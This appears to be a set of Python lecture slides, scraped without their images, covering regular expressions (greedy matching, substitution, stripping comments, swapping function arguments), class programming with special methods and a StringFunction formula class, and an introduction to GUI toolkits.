![]() | Avoid nested OR expressions (recall our first tries):
real_sn = r"-?\d\.?\d*[Ee][+\-]\d+"
real_dn = r"-?\d*\.\d*"
real = r"\s*(" + real_sn + "|" + real_dn + "|" + real_in + r")\s*"
interval = r"\[" + real + "," + real + r"\]"
|
| Cost: (slightly) less general and safe regex |

![]() | re.findall finds all matches (re.search finds the first)
>>> r = r"\d+\.\d*" >>> s = "3.29 is a number, 4.2 and 0.5 too" >>> re.findall(r,s) ['3.29', '4.2', '0.5'] |
![]() | Application to the interval example:
lower, upper = re.findall(real, '[-3, 9.87E+02]') # real: regex for real number with only one group! |

![]() | If the regex contains groups, re.findall returns the matches of all groups - this might be confusing!
>>> r = r"(\d+)\.\d*" >>> s = "3.29 is a number, 4.2 and 0.5 too" >>> re.findall(r,s) ['3', '4', '0'] |
![]() | Application to the interval example:
>>> real_short = r"([+\-]?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)"
>>> # recall: real_short contains many nested groups!
>>> g = re.findall(real_short, '[-3, 9.87E+02]')
>>> g
[('-3', '3', '', ''), ('9.87E+02', '9.87', '.87', 'E+02')]
>>> limits = [ float(g1) for g1, g2, g3, g4 in g ]
>>> limits
[-3.0, 987.0]
|

![]() | Regex is often a question of structure and context |
![]() | Simpler regex for extracting interval limits:
\[(.*),(.*)\] |
![]() | It works!
>>> l = re.search(r'\[(.*),(.*)\]',
' [-3.2E+01,0.11 ]').groups()
>>> l
('-3.2E+01', '0.11 ')
# transform to real numbers:
>>> r = [float(x) for x in l]
>>> r
[-32.0, 0.11]
|

![]() | Let us test the simple regex on a more complicated text:
>>> l = re.search(r'\[(.*),(.*)\]', \
' [-3.2E+01,0.11 ] and [-4,8]').groups()
>>> l
('-3.2E+01,0.11 ] and [-4', '8')
Regular expressions can surprise you...!
|
![]() | Regular expressions are greedy, they attempt to find the longest possible match, here from [ to the last (!) comma |
![]() | We want a shortest possible match, up to the first comma, i.e., a non-greedy match |
![]() | Add a ? to get a non-greedy match:
\[(.*?),(.*?)\] |
![]() | Now l becomes
('-3.2E+01', '0.11 ')
|

![]() | Instead of using a non-greedy match, we can use
\[([^,]*),([^\]]*)\] |
![]() | Note: only the first group (here first interval) is found by re.search, use re.findall to find all |

![]() | The simple regexes
\[([^,]*),([^\]]*)\] \[(.*?),(.*?)\]are not fool-proof:
>>> l = re.search(r'\[([^,]*),([^\]]*)\]',
' [e.g., exception]').groups()
>>> l
('e.g.', ' exception')
|
![]() | 100 percent reliable fix: use the detailed real number regex inside the parenthesis |
![]() | The simple regex is ok for personal code |

![]() | Suppose we, in an input file to a simulator, can specify a grid using this syntax:
domain=[0,1]x[0,2] indices=[1:21]x[0:100] domain=[0,15] indices=[1:61] domain=[0,1]x[0,1]x[0,1] indices=[0:10]x[0:10]x[0:20] |
![]() | Can we easily extract domain and indices limits and store them in variables? |

![]() | Specify a regex for an interval with real number limits |
![]() | Use re.findall to extract multiple intervals |
![]() | Problems: many nested groups due to complicated real number specifications |
![]() | Various remedies: as in the interval examples, see fdmgrid.py |
![]() | The bottom line: a very simple regex, utilizing the surrounding structure, works well |

![]() | We can get away with a simple regex, because of the surrounding structure of the text:
indices = r"\[([^:,]*):([^\]]*)\]" # works domain = r"\[([^,]*),([^\]]*)\]" # works |
![]() | Note: these ones do not work:
indices = r"\[([^:]*):([^\]]*)\]" indices = r"\[(.*?):(.*?)\]"They match too much:
domain=[0,1]x[0,2] indices=[1:21]x[1:101]
[.....................:
we need to exclude commas (i.e. left bracket, anything but comma or colon, colon, anythin but right bracket)
|

![]() | Split a string into words:
line.split(splitstring) # or string.split(line, splitstring) |
![]() | Split wrt a regular expression:
>>> files = "case1.ps, case2.ps, case3.ps"
>>> import re
>>> re.split(r",\s*", files)
['case1.ps', 'case2.ps', 'case3.ps']
>>> files.split(", ") # a straight string split is undesired
['case1.ps', 'case2.ps', ' case3.ps']
>>> re.split(r"\s+", "some words in a text")
['some', 'words', 'in', 'a', 'text']
|
![]() |
Notice the effect of this:
>>> re.split(r" ", "some words in a text") ['some', '', '', '', 'words', '', '', 'in', 'a', 'text'] |

![]() | ...also called flags in Python regex documentation |
![]() | Check if a user has written "yes" as answer:
if re.search('yes', answer):
|
![]() | Problem: "YES" is not recognized; try a fix
if re.search(r'(yes|YES)', answer): |
![]() | Should allow "Yes" and "YEs" too...
if re.search(r'[yY][eE][sS]', answer): |
![]() | This is hard to read and case-insensitive matches occur frequently - there must be a better way! |

if re.search('yes', answer, re.IGNORECASE):
# pattern-matching modifier: re.IGNORECASE
# now we get a match for 'yes', 'YES', 'Yes' ...
# ignore case:
re.I or re.IGNORECASE
# let ^ and $ match at the beginning and
# end of every line:
re.M or re.MULTILINE
# allow comments and white space:
re.X or re.VERBOSE
# let . (dot) match newline too:
re.S or re.DOTALL
# let e.g. \w match special chars (å, æ, ...):
re.L or re.LOCALE

![]() | The re.X or re.VERBOSE modifier is very useful for inserting comments explaning various parts of a regular expression |
![]() | Example:
# real number in scientific notation:
real_sn = r"""
-? # optional minus
\d\.\d+ # a number like 1.4098
[Ee][+\-]\d\d? # exponent, E-03, e-3, E+12
"""
match = re.search(real_sn, 'text with a=1.92E-04 ',
re.VERBOSE)
# or when using compile:
c = re.compile(real_sn, re.VERBOSE)
match = c.search('text with a=1.9672E-04 ')
|

![]() | Substitute float by double:
# filestr contains a file as a string
filestr = re.sub('float', 'double', filestr)
|
![]() | In general:
re.sub(pattern, replacement, str) |
![]() | If there are groups in pattern, these are accessed by
\1 \2 \3 ... \g<1> \g<2> \g<3> ... \g<lower> \g<upper> ...in replacement |

![]() | C-style comments could be nice to have in scripts for commenting out large portions of the code:
/*
while 1:
line = file.readline()
...
...
*/
|
![]() | Write a script that strips C-style comments away |
![]() | Idea: match comment, substitute by an empty string |

![]() | Suggested regex for C-style comments:
comment = r'/\*.*\*/' # read file into string filestr filestr = re.sub(comment, '', filestr)i.e., match everything between /* and */ |
![]() | Bad: . does not match newline |
![]() | Fix: re.S or re.DOTALL modifier makes . match newline:
comment = r'/\*.*\*/' c_comment = re.compile(comment, re.DOTALL) filestr = c_comment.sub(comment, '', filestr) |
![]() | OK? No! |

/********************************************/
/* File myheader.h */
/********************************************/
#include <stuff.h> // useful stuff
class MyClass
{
/* int r; */ float q;
// here goes the rest class declaration
}
/* LOG HISTORY of this file:
* $ Log: somefile,v $
* Revision 1.2 2000/07/25 09:01:40 hpl
* update
*
* Revision 1.1.1.1 2000/03/29 07:46:07 hpl
* register new files
*
*/

![]() | The regex
/\*.*\*/ with re.DOTALL (re.S)matches the whole file (i.e., the whole file is stripped away!) |
![]() | Why? a regex is by default greedy, it tries the longest possible match, here the whole file |
![]() | A question mark makes the regex non-greedy:
/\*.*?\*/ |

![]() | The non-greedy version works |
![]() | OK? Yes - the job is done, almost...
const char* str ="/* this is a comment */"gets stripped away to an empty string... |

![]() | Suppose you have written a C library which has many users |
![]() | One day you decide that the function
void superLibFunc(char* method, float x)would be more natural to use if its arguments were swapped: void superLibFunc(float x, char* method) |
![]() | All users of your library must then update their application codes - can you automate? |

![]() | You want locate all strings on the form
superLibFunc(arg1, arg2)and transform them to superLibFunc(arg2, arg1) |
![]() | Let arg1 and arg2 be groups in the regex for the superLibFunc calls |
![]() | Write out
superLibFunc(\2, \1) # recall: \1 is group 1, \2 is group 2 in a re.sub command |

![]() | Basic structure of the regex of calls:
superLibFunc\s*\(\s*arg1\s*,\s*arg2\s*\)but what should the arg1 and arg2 patterns look like? |
![]() | Natural start: arg1 and arg2 are valid C variable names
arg = r"[A-Za-z_0-9]+" |
![]() | Fix; digits are not allowed as the first character:
arg = "[A-Za-z_][A-Za-z_0-9]*" |

![]() | The regex
arg = "[A-Za-z_][A-Za-z_0-9]*"works well for calls with variables, but we can call superLibFunc with numbers too:
superLibFunc ("relaxation", 1.432E-02);
|
![]() | Possible fix:
arg = r"[A-Za-z0-9_.\-+\"]+"but the disadvantage is that arg now also matches .+-32skj 3.ejks |

![]() | Since arg2 is a float we can make a precise regex: legal C variable name OR legal real variable format
arg2 = r"([A-Za-z_][A-Za-z_0-9]*|" + real + \
"|float\s+[A-Za-z_][A-Za-z_0-9]*" + ")"
where real is our regex for formatted real numbers:
real_in = r"-?\d+"
real_sn = r"-?\d\.\d+[Ee][+\-]\d\d?"
real_dn = r"-?\d*\.\d+"
real = r"\s*("+ real_sn +"|"+ real_dn +"|"+ real_in +r")\s*"
|

![]() | We can now treat variables and numbers in calls |
![]() | Another problem: should swap arguments in a user's definition of the function:
void superLibFunc(char* method, float x) to void superLibFunc(float x, char* method)Note: the argument names (x and method) can also be omitted! |
![]() | Calls and declarations of superLibFunc can be written on more than one line and with embedded C comments! |
![]() | Giving up? |

![]() | Instead of trying to make a precise regex, let us make a very simple one:
arg = '.+' # any text |
![]() | "Any text" may be precise enough since we have the surrounding structure,
superLibFunc\s*(\s*arg\s*,\s*arg\s*)and assume that a C compiler has checked that arg is a valid C code text in this context |

![]() | A problem with .+ appears in lines with more than one calls:
superLibFunc(a,x); superLibFunc(ppp,qqq); |
![]() | We get
a match for the first argument equal to
a,x); superLibFunc(ppp |
![]() | Remedy: non-greedy regex (see later) or
arg = r"[^,]+"This one matches multi-line calls/declarations, also with embedded comments (.+ does not match newline unless the re.S modifier is used) |

![]() |
Central code statements:
arg = r"[^,]+" call = r"superLibFunc\s*\(\s*(%s),\s*(%s)\)" % (arg,arg) # load file into filestr # substutite: filestr = re.sub(call, r"superLibFunc(\2, \1)", filestr) # write out file again fileobject.write(filestr) |

![]() | Test text:
superLibFunc(a,x); superLibFunc(qqq,ppp);
superLibFunc ( method1, method2 );
superLibFunc(3method /* illegal name! */, method2 ) ;
superLibFunc( _method1,method_2) ;
superLibFunc (
method1 /* the first method we have */ ,
super_method4 /* a special method that
deserves a two-line comment... */
) ;
|
![]() | The simple regex successfully transforms this into
superLibFunc(x, a); superLibFunc(ppp, qqq);
superLibFunc(method2 , method1);
superLibFunc(method2 , 3method /* illegal name! */) ;
superLibFunc(method_2, _method1) ;
superLibFunc(super_method4 /* a special method that
deserves a two-line comment... */
, method1 /* the first method we have */ ) ;
|
![]() | Notice how powerful a small regex can be!! |
![]() | Downside: cannot handle a function call as argument |

![]() | The simple regex
[^,]+breaks down for comments with comma(s) and function calls as arguments, e.g., superLibFunc(m1, a /* large, random number */); superLibFunc(m1, generate(c, q2));The regex will match the longest possible string ending with a comma, in the first line m1, a /* large,but then there are no more commas ... |
![]() | A complete solution should parse the C code |

![]() |
The superLibFunc call with comments and named groups:
call = re.compile(r"""
superLibFunc # name of function to match
\s* # possible whitespace
\( # parenthesis before argument list
\s* # possible whitespace
(?P<arg1>%s) # first argument plus optional whitespace
, # comma between the arguments
\s* # possible whitespace
(?P<arg2>%s) # second argument plus optional whitespace
\) # closing parenthesis
""" % (arg,arg), re.VERBOSE)
# the substitution command:
filestr = call.sub(r"superLibFunc(\g<arg2>,
\g<arg1>)",filestr)
|

![]() | Goal: remove C++/Java comments from source codes |
![]() | Load a source code file into a string:
filestr = open(somefile, 'r').read() # note: newlines are a part of filestr |
![]() | Substitute comments // some text... by an empty string:
filestr = re.sub(r'//.*', '', filestr) |
![]() | Note: . (dot) does not match newline; if it did, we would need to say
filestr = re.sub(r'//[^\n]*', '', filestr) |

![]() | How will the substitution
filestr = re.sub(r'//[^\n]*', '', filestr)treat a line like const char* heading = "------------//------------";??? |

![]() |
The following useful function demonstrate how to extract
matches, groups etc. for examination:
def debugregex(pattern, str):
s = "does '" + pattern + "' match '" + str + "'?\n"
match = re.search(pattern, str)
if match:
s += str[:match.start()] + "[" + \
str[match.start():match.end()] + \
"]" + str[match.end():]
if len(match.groups()) > 0:
for i in range(len(match.groups())):
s += "\ngroup %d: [%s]" % \
(i+1,match.groups()[i])
else:
s += "No match"
return s
|

![]() |
Example on usage:
>>> print debugregex(r"(\d+\.\d*)",
"a= 51.243 and b =1.45")
does '(\d+\.\d*)' match 'a= 51.243 and b =1.45'?
a= [51.243] and b =1.45
group 1: [51.243]
|


![]() | Intro to the class syntax |
![]() | Special attributes |
![]() | Special methods |
![]() | Classic classes, new-style classes |
![]() | Static data, static functions |
![]() | Properties |
![]() | About scope |

![]() | Ch. 8.6 in the course book |
![]() | Python Tutorial |
![]() | Python Reference Manual (special methods in 3.3) |
![]() | Python in a Nutshell (OOP chapter - recommended!) |

![]() | Similar class concept as in Java and C++ |
![]() | All functions are virtual |
![]() | No private/protected variables (the effect can be "simulated") |
![]() | Single and multiple inheritance |
![]() | Everything in Python is a class and works with classes |
![]() | Class programming is easier and faster than in C++ and Java (?) |

![]() | Declare a base class MyBase:
class MyBase:
def __init__(self,i,j): # constructor
self.i = i; self.j = j
def write(self): # member function
print 'MyBase: i=',self.i,'j=',self.j
|
![]() | self is a reference to this object |
![]() | Data members are prefixed by self: self.i, self.j |
![]() | All functions take self as first argument in the declaration, but not in the call
inst1 = MyBase(6,9); inst1.write() |

![]() | Class MySub is a subclass of MyBase:
class MySub(MyBase):
def __init__(self,i,j,k): # constructor
MyBase.__init__(self,i,j)
self.k = k;
def write(self):
print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
|
![]() | Example:
# this function works with any object that has a write func: def write(v): v.write() # make a MySub instance i = MySub(7,8,9) write(i) # will call MySub's write |

![]() | Consider
def write(v):
v.write()
write(i) # i is MySub instance
|
![]() | In C++/Java we would declare v as a MyBase reference and rely on i.write() as calling the virtual function write in MySub |
![]() | The same works in Python, but we do not need inheritance and virtual functions here: v.write() will work for any object v that has a callable attribute write that takes no arguments |
![]() | Object-orientation in C++/Java for parameterizing types is not needed in Python since variables are not declared with types |

![]() | There is no technical way of preventing users from manipulating data and methods in an object |
![]() | Convention: attributes and methods starting with an underscore are treated as non-public (``protected'') |
![]() | Names starting with a double underscore are considered strictly private (Python mangles class name with method name in this case: obj.__some has actually the name _obj__some) |
class MyClass:
def __init__(self):
self._a = False # non-public
self.b = 0 # public
self.__c = 0 # private

![]() | Dictionary of user-defined attributes:
>>> i1.__dict__ # dictionary of user-defined attributes
{'i': 5, 'j': 7}
>>> i2.__dict__
{'i': 7, 'k': 9, 'j': 8}
|
![]() | Name of class, name of method:
>>> i2.__class__.__name__ # name of class 'MySub' >>> i2.write.__name__ # name of method 'write' |
![]() | List names of all methods and attributes:
>>> dir(i2) ['__doc__', '__init__', '__module__', 'i', 'j', 'k', 'write'] |

![]() | Use isinstance for testing class type:
if isinstance(i2, MySub):
# treat i2 as a MySub instance
|
![]() | Can test if a class is a subclass of another:
if issubclass(MySub, MyBase):
...
|
![]() | Can test if two objects are of the same class:
if inst1.__class__ is inst2.__class__(is checks object identity, == checks for equal contents) |
![]() | a.__class__ refers the class object of instance a |

![]() | Attributes can be added at run time (!)
>>> class G: pass >>> g = G() >>> dir(g) ['__doc__', '__module__'] # no user-defined attributes >>> # add instance attributes: >>> g.xmin=0; g.xmax=4; g.ymin=0; g.ymax=1 >>> dir(g) ['__doc__', '__module__', 'xmax', 'xmin', 'ymax', 'ymin'] >>> g.xmin, g.xmax, g.ymin, g.ymax (0, 4, 0, 1) >>> # add static variables: >>> G.xmin=0; G.xmax=2; G.ymin=-1; G.ymax=1 >>> g2 = G() >>> g2.xmin, g2.xmax, g2.ymin, g2.ymax # static variables (0, 2, -1, 1) |

![]() | Can work with __dict__ directly:
>>> i2.__dict__['q'] = 'some string' >>> i2.q 'some string' >>> dir(i2) ['__doc__', '__init__', '__module__', 'i', 'j', 'k', 'q', 'write'] |

![]() | Special methods have leading and trailing double underscores (e.g. __str__) |
![]() | Here are some operations defined by special methods:
len(a) # a.__len__() c = a*b # c = a.__mul__(b) a = a+b # a = a.__add__(b) a += c # a.__iadd__(c) d = a[3] # d = a.__getitem__(3) a[3] = 0 # a.__setitem__(3, 0) f = a(1.2, True) # f = a.__call__(1.2, True) if a: # if a.__len__()>0: or if a.__nonzero(): |

![]() | Suppose we need a function of x and y with three additional parameters a, b, and c:
def f(x, y, a, b, c):
return a + b*x + c*y*y
|
![]() | Suppose we need to send this function to another function
def gridvalues(func, xcoor, ycoor, file):
for i in range(len(xcoor)):
for j in range(len(ycoor)):
f = func(xcoor[i], ycoor[j])
file.write('%g %g %g\n' % (xcoor[i], ycoor[j], f)
func is expected to be a function of x and y only (many libraries need to make such assumptions!)
|
![]() | How can we send our f function to gridvalues? |

![]() | Solution 1: global parameters
global a, b, c
...
def f(x, y):
return a + b*x + c*y*y
...
a = 0.5; b = 1; c = 0.01
gridvalues(f, xcoor, ycoor, somefile)
Global variables are usually considered evil
|
![]() | Solution 2: keyword arguments for parameters
def f(x, y, a=0.5, b=1, c=0.01):
return a + b*x + c*y*y
...
gridvalues(f, xcoor, ycoor, somefile)
useless for other values of a, b, c
|

![]() | Make a class with function behavior instead of a pure function |
![]() | The parameters are class attributes |
![]() | Class instances can be called as ordinary functions, now with x and y as the only formal arguments
class F:
def __init__(self, a=1, b=1, c=1):
self.a = a; self.b = b; self.c = c
def __call__(self, x, y): # special method!
return self.a + self.b*x + self.c*y*y
f = F(a=0.5, c=0.01)
# can now call f as
v = f(0.1, 2)
...
gridvalues(f, xcoor, ycoor, somefile)
|

![]() | __init__(self [, args]): constructor |
![]() | __del__(self): destructor (seldom needed since Python offers automatic garbage collection) |
![]() | __str__(self): string representation for pretty printing of the object (called by print or str) |
![]() | __repr__(self): string representation for initialization (a==eval(repr(a)) is true) |

![]() | __eq__(self, x): for equality (a==b), should return True or False |
![]() | __cmp__(self, x): for comparison (<, <=, >, >=, ==, !=); return negative integer, zero or positive integer if self is less than, equal or greater than x (resp.) |
![]() | __len__(self): length of object (called by len(x)) |
![]() | __call__(self [, args]): calls like a(x,y) implies a.__call__(x,y) |

![]() | __getitem__(self, i): used for subscripting: b = a[i] |
![]() | __setitem__(self, i, v): used for subscripting: a[i] = v |
![]() | __delitem__(self, i): used for deleting: del a[i] |
![]() | These three functions are also used for slices: a[p:q:r] implies that i is a slice object with attributes start (p), stop (q) and step (r) b = a[:-1] # implies b = a.__getitem__(i) isinstance(i, slice) is True i.start is None i.stop is -1 i.step is None |

![]() | __add__(self, b): used for self+b, i.e., x+y implies x.__add__(y) |
![]() | __sub__(self, b): self-b |
![]() | __mul__(self, b): self*b |
![]() | __div__(self, b): self/b |
![]() | __pow__(self, b): self**b or pow(self,b) |

![]() | __iadd__(self, b): self += b |
![]() | __isub__(self, b): self -= b |
![]() | __imul__(self, b): self *= b |
![]() | __idiv__(self, b): self /= b |

![]() | __radd__(self, b): This method defines b+self, while __add__(self, b) defines self+b. If a+b is encountered and a does not have an __add__ method, b.__radd__(a) is called if it exists (otherwise a+b is not defined). |
![]() | Similar methods: __rsub__, __rmul__, __rdiv__ |

![]() | __int__(self): conversion to integer (int(a) makes an a.__int__() call) |
![]() | __float__(self): conversion to float |
![]() | __hex__(self): conversion to hexadecimal number |

![]() | if a: when is a evaluated as true? |
![]() | If a has __len__ or __nonzero__ and the return value is 0 or False, a evaluates to false |
![]() | Otherwise: a evaluates to true |
![]() | Implication: no implementation of __len__ or __nonzero__ implies that a evaluates to true!! |
![]() | while a follows (naturally) the same set-up |

![]() | Matlab has a nice feature: mathematical formulas, written as text, can be turned into callable functions |
![]() | A similar feature in Python would be like
f = StringFunction_v1('1+sin(2*x)')
print f(1.2) # evaluates f(x) for x=1.2
|
![]() | f(x) implies f.__call__(x) |
![]() | Implementation of class StringFunction_v1 is compact! (see next slide) |

![]() | Simple implementation:
class StringFunction_v1:
def __init__(self, expression):
self._f = expression
def __call__(self, x):
return eval(self._f) # evaluate function expression
|
![]() | Problem: eval(string) is slow; should pre-compile expression
class StringFunction_v2:
def __init__(self, expression):
self._f_compiled = compile(expression,
'<string>', 'eval')
def __call__(self, x):
return eval(self._f_compiled)
|

![]() | The class concept was redesigned in Python v2.2 |
![]() | We have new-style (v2.2) and classic classes |
![]() | New-style classes add some convenient functionality to classic classes |
![]() | New-style classes must be derived from the object base class:
class MyBase(object):
# the rest of MyBase is as before
|

![]() | Static data (or class variables) are common to all instances
>>> class Point:
counter = 0 # static variable, counts no of instances
def __init__(self, x, y):
self.x = x; self.y = y;
Point.counter += 1
>>> for i in range(1000):
p = Point(i*0.01, i*0.001)
>>> Point.counter # access without instance
1000
>>> p.counter # access through instance
1000
|

![]() | New-style classes allow static methods (methods that can be called without having an instance)
class Point(object):
_counter = 0
def __init__(self, x, y):
self.x = x; self.y = y; Point._counter += 1
def ncopies(): return Point._counter
ncopies = staticmethod(ncopies)
|
![]() | Calls:
>>> Point.ncopies() 0 >>> p = Point(0, 0) >>> p.ncopies() 1 >>> Point.ncopies() 1 |
![]() | Cannot access self or class attributes in static methods |

![]() | Python 2.3 introduced ``intelligent'' assignment operators, known as properties |
![]() | That is, assignment may imply a function call:
x.data = mydata; yourdata = x.data # can be made equivalent to x.set_data(mydata); yourdata = x.get_data() |
![]() | Construction:
class MyClass(object): # new-style class required!
...
def set_data(self, d):
self._data = d
<update other data structures if necessary...>
def get_data(self):
<perform actions if necessary...>
return self._data
data = property(fget=get_data, fset=set_data)
|

Direct access:
my_object.attr1 = True a = my_object.attr1 | |
get/set functions:
class A:
def set_attr1(attr1):
self._attr1 = attr # underscore => non-public variable
self._update(self._attr1) # update internal data too
...
my_object.set_attr1(True)
a = my_object.get_attr1()
Tedious to write! Properties are simpler...
|

| Use direct access if user is allowed to read and assign values to the attribute | |
| Use properties to restrict access, with a corresponding underlying non-public class attribute | |
| Use properties when assignment or reading requires a set of associated operations | |
Never use get/set functions explicitly
myobj.compute_something() myobj.my_special_variable = yourobj.find_values(x,y) |

![]() | Example: a is global, local, and class attribute
a = 1 # global variable
def f(x):
a = 2 # local variable
class B:
def __init__(self):
self.a = 3 # class attribute
def scopes(self):
a = 4 # local (method) variable
|
![]() | Dictionaries with variable names as keys and variables as values:
locals() : local variables globals() : global variables vars() : local variables vars(self) : class attributes |

![]() | Function scope:
>>> a = 1
>>> def f(x):
a = 2 # local variable
print 'locals:', locals(), 'local a:', a
print 'global a:', globals()['a']
>>> f(10)
locals: {'a': 2, 'x': 10} local a: 2
global a: 1
a refers to local variable
|

![]() | Class:
class B:
def __init__(self):
self.a = 3 # class attribute
def scopes(self):
a = 4 # local (method) variable
print 'locals:', locals()
print 'vars(self):', vars(self)
print 'self.a:', self.a
print 'local a:', a, 'global a:', globals()['a']
|
![]() | Interactive test:
>>> b=B()
>>> b.scopes()
locals: {'a': 4, 'self': <scope.B instance at 0x4076fb4c>}
vars(self): {'a': 3}
self.a: 3
local a: 4 global a: 1
|

![]() | Variable interpolation with vars:
class C(B):
def write(self):
local_var = -1
s = '%(local_var)d %(global_var)d %(a)s' % vars()
|
![]() | Problem: vars() returns dict with local variables and the string needs global, local, and class variables |
![]() | Primary solution: use printf-like formatting:
s = '%d %d %d' % (local_var, global_var, self.a) |
![]() | More exotic solution:
all = {}
for scope in (locals(), globals(), vars(self)):
all.update(scope)
s = '%(local_var)d %(global_var)d %(a)s' % all
(but now we overwrite a...)
|

![]() | exec and eval may take dictionaries for the global and local namespace:
exec code in globals, locals eval(expr, globals, locals) |
![]() | Example:
a = 8; b = 9
d = {'a':1, 'b':2}
eval('a + b', d) # yields 3
and
from math import *
d['b'] = pi
eval('a+sin(b)', globals(), d) # yields 1
|
![]() | Creating such dictionaries can be handy |

![]() | Recall the StringFunction-classes for turning string formulas
into callable objects
f = StringFunction('1+sin(2*x)')
print f(1.2)
| ||||
![]() | We would like:
f = StringFunction_v3('1+A*sin(w*t)',
independent_variable='t',
set_parameters='A=0.1; w=3.14159')
print f(1.2)
f.set_parameters('A=0.2; w=3.14159')
print f(1.2)
|

| Idea: hold independent variable and ``set parameters'' code as strings | |
Exec these strings (to bring the variables into play) right before
the formula is evaluated
class StringFunction_v3:
def __init__(self, expression, independent_variable='x',
set_parameters=''):
self._f_compiled = compile(expression,
'<string>', 'eval')
self._var = independent_variable # 'x', 't' etc.
self._code = set_parameters
def set_parameters(self, code):
self._code = code
def __call__(self, x):
exec '%s = %g' % (self._var, x) # assign indep. var.
if self._code: exec(self._code) # parameters?
return eval(self._f_compiled)
|

| The exec used in the __call__ method is slow! | |
Think of a hardcoded function,
def f1(x):
return sin(x) + x**3 + 2*x
and the corresponding StringFunction-like objects
| |
Efficiency test (time units to the right):
f1 : 1 StringFunction_v1: 13 StringFunction_v2: 2.3 StringFunction_v3: 22Why? | |
| eval w/compile is important; exec is very slow |

| Ideas: hold parameters in a dictionary, set the independent variable into this dictionary, run eval with this dictionary as local namespace | |
Usage:
f = StringFunction_v4('1+A*sin(w*t)', A=0.1, w=3.14159)
f.set_parameters(A=2) # can be done later
|

Code:
class StringFunction_v4:
def __init__(self, expression, **kwargs):
self._f_compiled = compile(expression,
'<string>', 'eval')
self._var = kwargs.get('independent_variable', 'x')
self._prms = kwargs
try: del self._prms['independent_variable']
except: pass
def set_parameters(self, **kwargs):
self._prms.update(kwargs)
def __call__(self, x):
self._prms[self._var] = x
return eval(self._f_compiled, globals(), self._prms)
|

We would like arbitrary functions of arbitrary parameters and
independent variables:
f = StringFunction_v5('A*sin(x)*exp(-b*t)', A=0.1, b=1,
independent_variables=('x','t'))
print f(1.5, 0.01) # x=1.5, t=0.01
| |
Idea: add functionality in subclass
class StringFunction_v5(StringFunction_v4):
def __init__(self, expression, **kwargs):
StringFunction_v4.__init__(self, expression, **kwargs)
self._var = tuple(kwargs.get('independent_variables',
'x'))
try: del self._prms['independent_variables']
except: pass
def __call__(self, *args):
for name, value in zip(self._var, args):
self._prms[name] = value # add indep. variable
return eval(self._f_compiled,
self._globals, self._prms)
|

Test function: sin(x) + x**3 + 2*x
f1 : 1 StringFunction_v1: 13 (because of uncompiled eval) StringFunction_v2: 2.3 StringFunction_v3: 22 (because of exec in __call__) StringFunction_v4: 2.3 StringFunction_v5: 3.1 (because of loop in __call__) |

Instead of eval in __call__ we may build a
(lambda) function
class StringFunction:
def _build_lambda(self):
s = 'lambda ' + ', '.join(self._var)
# add parameters as keyword arguments:
if self._prms:
s += ', ' + ', '.join(['%s=%s' % (k, self._prms[k]) \
for k in self._prms])
s += ': ' + self._f
self.__call__ = eval(s, self._globals)
| |
For a call
f = StringFunction('A*sin(x)*exp(-b*t)', A=0.1, b=1,
independent_variables=('x','t'))
the s looks like
lambda x, t, A=0.1, b=1: return A*sin(x)*exp(-b*t) |

StringFunction objects are as efficient as similar hardcoded
objects, i.e.,
class F:
def __call__(self, x, y):
return sin(x)*cos(y)
but there is some overhead associated with the __call__ op.
| |
Trick: extract the underlying method and call it directly
f1 = F() f2 = f1.__call__ # f2(x,y) is faster than f1(x,y)Can typically reduce CPU time from 1.3 to 1.0 | |
| Conclusion: now we can grab formulas from command-line, GUI, Web, overhead} |

![]() | ``Pretty print'':
class StringFunction:
...
def __str__(self):
return self._f # just the string formula
|
![]() | Reconstruction: a = eval(repr(a))
# StringFunction('1+x+a*y',
independent_variables=('x','y'),
a=1)
def __repr__(self):
kwargs = ', '.join(['%s=%s' % (key, repr(value)) \
for key, value in self._prms.items()])
return "StringFunction1(%s, independent_variable=%s"
", %s)" % (repr(self._f), repr(self._var), kwargs)
|

>>> from py4cs.StringFunction import StringFunction
>>> f = StringFunction('1+sin(2*x)')
>>> f(1.2)
1.6754631805511511
>>> f = StringFunction('1+sin(2*t)', independent_variables='t')
>>> f(1.2)
1.6754631805511511
>>> f = StringFunction('1+A*sin(w*t)', independent_variables='t', \
A=0.1, w=3.14159)
>>> f(1.2)
0.94122173238695939
>>> f.set_parameters(A=1, w=1)
>>> f(1.2)
1.9320390859672263
>>> f(1.2, A=2, w=1) # can also set parameters in the call
2.8640781719344526

>>> # function of two variables:
>>> f = StringFunction('1+sin(2*x)*cos(y)', \
independent_variables=('x','y'))
>>> f(1.2,-1.1)
1.3063874788637866
>>> f = StringFunction('1+V*sin(w*x)*exp(-b*t)', \
independent_variables=('x','t'))
>>> f.set_parameters(V=0.1, w=1, b=0.1)
>>> f(1.0,0.1)
1.0833098208613807
>>> str(f) # print formula with parameters substituted by values
'1+0.1*sin(1*x)*exp(-0.1*t)'
>>> repr(f)
"StringFunction('1+V*sin(w*x)*exp(-b*t)',
independent_variables=('x', 't'), b=0.10000000000000001,
w=1, V=0.10000000000000001)"
>>> # vector field of x and y:
>>> f = StringFunction('[a+b*x,y]', \
independent_variables=('x','y'))
>>> f.set_parameters(a=1, b=2)
>>> f(2,1) # [1+2*2, 1]
[5, 1]

![]() | Implement a class for vectors in 3D |
![]() | Application example:
>>> from Vec3D import Vec3D >>> u = Vec3D(1, 0, 0) # (1,0,0) vector >>> v = Vec3D(0, 1, 0) >>> print u**v # cross product (0, 0, 1) >>> len(u) # Eucledian norm 1.0 >>> u[1] # subscripting 0 >>> v[2]=2.5 # subscripting w/assignment >>> u+v # vector addition (1, 1, 2.5) >>> u-v # vector subtraction (1, -1, -2.5) >>> u*v # inner (scalar, dot) product 0 >>> str(u) # pretty print '(1, 0, 0)' >>> repr(u) # u = eval(repr(u)) 'Vec3D(1, 0, 0)' |

![]() | Make the arithmetic operators +, - and *
more intelligent:
u = Vec3D(1, 0, 0) v = Vec3D(0, -0.2, 8) a = 1.2 u+v # vector addition a+v # scalar plus vector, yields (1.2, 1, 9.2) v+a # vector plus scalar, yields (1.2, 1, 9.2) a-v # scalar minus vector v-a # scalar minus vector a*v # scalar times vector v*a # vector times scalar |


![]() | Introductory GUI programming |
![]() | Scientific Hello World examples |
![]() | GUI for simviz1.py |
![]() | GUI elements: text, input text, buttons, sliders, frames (for controlling layout) |

![]() | Tk (Tkinter) |
![]() | Qt (PyQt) |
![]() | wxWindows (wxPython) |
![]() | Gtk (PyGtk) |
![]() | Java Foundation Classes (JFC) (java.swing in Jython) |
![]() | Microsoft Foundation Classes (PythonWin) |

